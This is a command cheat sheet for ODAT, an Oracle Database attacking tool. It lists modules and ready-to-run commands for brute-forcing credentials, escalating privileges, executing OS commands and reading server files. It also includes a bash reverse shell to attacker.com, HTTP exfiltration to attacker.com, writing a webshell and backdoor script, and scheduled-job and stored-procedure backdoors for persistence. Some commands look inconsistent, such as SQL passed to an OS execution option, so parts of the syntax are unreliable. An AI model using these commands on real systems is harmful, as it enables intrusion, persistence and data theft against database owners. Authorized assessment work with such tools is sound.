ODAT

Overview

ODAT (Oracle Database Attacking Tool) is a Python-based penetration testing toolkit specifically designed for Oracle Database security testing. It identifies misconfigurations, weak credentials, and exploitable vulnerabilities in Oracle Database instances. ODAT can perform reconnaissance, credential testing, privilege escalation, and code execution on vulnerable Oracle systems.

The tool combines multiple attack vectors including SQL injection, default credential testing, privilege escalation, and direct database access exploitation. It’s essential for database security professionals conducting authorized assessments of Oracle infrastructure.

Installation

Requirements

# Python 3.x
python3 --version

# pip for package management
pip3 --version

# Oracle client libraries (optional but recommended)
# Install libaio1 on Linux
sudo apt-get install libaio1 libaio-dev

Installation via Git

# Clone the repository
git clone https://github.com/quentinhardy/odat.git
cd odat

# Install dependencies
pip3 install -r requirements.txt

# Make executable
chmod +x odat.py

# Test installation
python3 odat.py --help

Installation from PyPI

# Install via pip
pip3 install odat

# Verify
odat --help

Docker Installation

# Build Docker image
docker build -t odat .

# Run in Docker
docker run -it odat --help

Basic Syntax

python3 odat.py [module] [options]
odat [module] [options]

Core Modules

Module	Description	Purpose
all	Run all modules	Complete assessment
tnslsnr	TNS Listener reconnaissance	Enumerate services
listener	Listener enumeration	Service discovery
tnspoison	TNS poisoning	MITM attack vector
credentialstest	Test default credentials	Quick credential check
utlfile	UTL_FILE privilege check	File read/write testing
utlhttp	UTL_HTTP testing	HTTP request capability
httpserver	HTTP server module	Web interface access
externaltable	External table creation	Data access method
dbmsxmlquery	DBMS_XMLQUERY testing	XML query execution
dbmsscheduler	DBMS_SCHEDULER testing	Scheduled job creation
java	Java execution testing	Code execution path
oraexec	Operating system command execution	Shell command access
ctxsys	CTXSYS module testing	Context privileges
mdsys	MDSYS module testing	Spatial features
silverknight	SilverKnight password audit	Password strength check
passwords	Password dictionary testing	Credential brute-force

Essential Commands

Command	Description
-h, --help	Display help message
-v	Verbose output
-vv	Very verbose output
--version	Show version
-t, --target	Target host or IP address
-p, --port	Target database port (default: 1521)
-d, --database	Database name (SID)
-U, --user	Username for authentication
-P, --password	Password for authentication
--accounts-file	File with account credentials
--passwords-file	Wordlist for password testing
-m, --module	Specific module to run
--all	Run all applicable modules
-x	Exploit/attack mode
--output	Output file for results

TNS Listener Enumeration

Listener Discovery

# Enumerate TNS listeners
python3 odat.py tnslsnr -t 192.168.1.100 -vv

# Output includes:
# - Version information
# - Service names
# - Instance details
# - Listener status

Service Enumeration

# Get detailed service information
python3 odat.py listener -t 192.168.1.100 -p 1521

# Lists:
# - Available database instances
# - Service names (SIDs)
# - Network aliases

Check Listener Version

# Specific listener information
python3 odat.py tnslsnr -t 192.168.1.100 -p 1521 -vv

# Useful for identifying vulnerable versions

Credential Testing

Default Credentials

# Test common Oracle default credentials
python3 odat.py credentialstest -t 192.168.1.100 -p 1521 -d ORCL -U sys -P change_on_install

# Common accounts:
# - sys / change_on_install
# - system / manager
# - scott / tiger
# - dbsnmp / dbsnmp
# - sysman / sysman

Credential Testing from Wordlist

# Test credentials from file
python3 odat.py credentialstest -t 192.168.1.100 -p 1521 -d ORCL \
  --accounts-file accounts.txt

# accounts.txt format:
# username:password
# sys:change_on_install
# system:manager

Brute-Force Testing

# Test password list against known users
python3 odat.py credentialstest -t 192.168.1.100 -p 1521 -d ORCL \
  -U system --passwords-file passwords.txt

# Test multiple users with wordlist
python3 odat.py passwords -t 192.168.1.100 -p 1521 -d ORCL \
  --users-file users.txt --passwords-file passwords.txt

Privilege Escalation

Direct Privilege Escalation

# Escalate from limited user to admin
python3 odat.py java -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --sysdba

# Gain SYSDBA privileges
python3 odat.py oraexec -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password -x

Vulnerable Packages Exploitation

# Exploit vulnerable Oracle packages
python3 odat.py dbmsscheduler -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger -x

# CTXSYS privilege escalation
python3 odat.py ctxsys -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger -x

# MDSYS exploitation
python3 odat.py mdsys -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger -x

File System Access

Read Files via UTL_FILE

# Read local files
python3 odat.py utlfile -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --read /etc/passwd

# Read Oracle files
python3 odat.py utlfile -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --read /u01/app/oracle/alert/alert_ORCL.log

Write Files via UTL_FILE

# Write files to server
python3 odat.py utlfile -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --write /tmp/backdoor.sh

# Create webshell
python3 odat.py utlfile -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --write /var/www/html/shell.jsp

Create External Tables

# Create external table for file access
python3 odat.py externaltable -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --read /etc/passwd

# Extract data from server
python3 odat.py externaltable -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --read /u01/app/oracle/oradata/ORCL/system01.dbf

Code Execution

Execute Operating System Commands

# Direct OS command execution
python3 odat.py oraexec -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --exec "whoami"

# Execute commands via Java
python3 odat.py java -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --exec "id"

# Create reverse shell
python3 odat.py oraexec -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --exec "bash -i >& /dev/tcp/attacker.com/4444 0>&1"

Scheduled Job Execution

# Use DBMS_SCHEDULER for persistence
python3 odat.py dbmsscheduler -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --create-job "myjob" --exec "whoami"

# Execute at specific time
python3 odat.py dbmsscheduler -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --create-job "myjob" --schedule "FREQ=DAILY;BYHOUR=2"

HTTP Communication

HTTP Server Access

# Check HTTP server capabilities
python3 odat.py httpserver -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --geturl "http://attacker.com/file"

# Upload files via HTTP
python3 odat.py httpserver -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --putfile "shell.jsp" "attacker.com"

UTL_HTTP Exploitation

# Make HTTP requests from database
python3 odat.py utlhttp -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --request "GET http://attacker.com/data"

# Data exfiltration via HTTP
python3 odat.py utlhttp -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --request "POST http://attacker.com/exfil"

Network Attacks

TNS Listener Poisoning

# Poison TNS responses for MITM attack
python3 odat.py tnspoison -t 192.168.1.100 -vv

# Intercept and modify connections
# Require network access on same segment

Comprehensive Assessment

Full Database Audit

# Run all assessment modules
python3 odat.py all -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger -vv

# Includes:
# - Service enumeration
# - Credential testing
# - Privilege escalation checks
# - File access verification
# - Code execution paths

Multi-Database Assessment

# Test against multiple databases
for db in DB1 DB2 DB3; do
  python3 odat.py all -t 192.168.1.100 -p 1521 -d $db \
    -U scott -P tiger -vv --output "$db-audit.txt"
done

Vulnerability Assessment

# Check for known vulnerabilities
python3 odat.py all -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password -vv 2>&1 | grep -i "vulnerable\|exploit\|vulnerability"

Advanced Exploitation

Chaining Multiple Exploits

#!/bin/bash
# 1. Identify valid credentials
python3 odat.py credentialstest -t 192.168.1.100 -p 1521 \
  -d ORCL --accounts-file accounts.txt > valid_creds.txt

# 2. Test for privilege escalation
python3 odat.py java -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger -vv > priv_esc.txt

# 3. Execute commands if possible
python3 odat.py oraexec -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --exec "cat /etc/hostname"

Persistence Mechanisms

# Create scheduled job for persistence
python3 odat.py dbmsscheduler -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --create-job "backdoor" \
  --exec "bash /tmp/persistence.sh" \
  --schedule "FREQ=HOURLY"

# Create stored procedure backdoor
python3 odat.py oraexec -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --exec "CREATE OR REPLACE PROCEDURE backdoor AS BEGIN EXECUTE IMMEDIATE 'whoami'; END;"

Data Exfiltration

# Extract sensitive data
python3 odat.py utlfile -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --read /u01/app/oracle/oradata/

# Query database and exfiltrate
python3 odat.py oraexec -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --exec \
  "SELECT * FROM sys.user\$ WHERE TYPE#=1" > users.txt

Password Auditing

SilverKnight Password Check

# Audit password strength
python3 odat.py silverknight -t 192.168.1.100 -p 1521 -d ORCL \
  -U sys -P change_on_install

# Identifies:
# - Weak passwords
# - Default credentials
# - Dictionary words
# - Common patterns

Password Dictionary Attack

# Brute-force with wordlist
python3 odat.py passwords -t 192.168.1.100 -p 1521 -d ORCL \
  --users-file users.txt --passwords-file /usr/share/wordlists/rockyou.txt

# Custom wordlist
python3 odat.py passwords -t 192.168.1.100 -p 1521 -d ORCL \
  --users-file users.txt --passwords-file custom-passwords.txt

Real-World Assessment Workflow

Phase 1: Reconnaissance

# Identify Oracle services
python3 odat.py tnslsnr -t 192.168.1.100 -vv

# Enumerate instances
python3 odat.py listener -t 192.168.1.100 -p 1521 -vv

Phase 2: Credential Testing

# Test default credentials
python3 odat.py credentialstest -t 192.168.1.100 -p 1521 \
  -d ORCL --accounts-file default-accounts.txt

# Brute-force weak passwords
python3 odat.py passwords -t 192.168.1.100 -p 1521 -d ORCL \
  -U system --passwords-file passwords.txt

Phase 3: Privilege Escalation

# Check for privilege escalation vectors
python3 odat.py java -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger -vv

python3 odat.py ctxsys -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger -vv

Phase 4: Exploitation

# Attempt code execution
python3 odat.py oraexec -t 192.168.1.100 -p 1521 -d ORCL \
  -U system -P password --exec "whoami"

# Extract sensitive data
python3 odat.py utlfile -t 192.168.1.100 -p 1521 -d ORCL \
  -U scott -P tiger --read /etc/passwd

Troubleshooting

Connection Issues

# Test connectivity
python3 odat.py tnslsnr -t 192.168.1.100 -p 1521 -vv

# Check firewall
telnet 192.168.1.100 1521

# Verify database name (SID)
tnsping ORCL

Authentication Failures

# Verify credentials
sqlplus scott/tiger@192.168.1.100:1521/ORCL

# Check user privileges
python3 odat.py credentialstest -t 192.168.1.100 -p 1521 \
  -d ORCL -U scott -P tiger -vv

Module Execution Errors

# Enable verbose output
python3 odat.py <module> -t <target> -vv

# Check Python version
python3 --version

# Verify dependencies
pip3 list | grep cx_Oracle

Security Considerations

• Obtain written authorization before testing
• Use ODAT in controlled lab environments only
• Minimize impact on production systems
• Document all activities and findings
• Use appropriate network isolation
• Maintain confidentiality of assessment results
• Follow organizational security policies
• Implement proper logging and monitoring

Related Tools

• sqlplus - Oracle command-line client
• SQLMap - SQL injection testing tool
• Metasploit - General penetration testing framework
• Burp Suite - Web application testing (for web-based access)
• tnsping - Oracle TNS connectivity tool
• nmap - Network discovery and scanning

References

• ODAT GitHub: https://github.com/quentinhardy/odat
• Oracle Database documentation
• OWASP Database Security
• CVE Oracle Database vulnerabilities
• Authorized penetration testing methodologies
• Responsible disclosure guidelines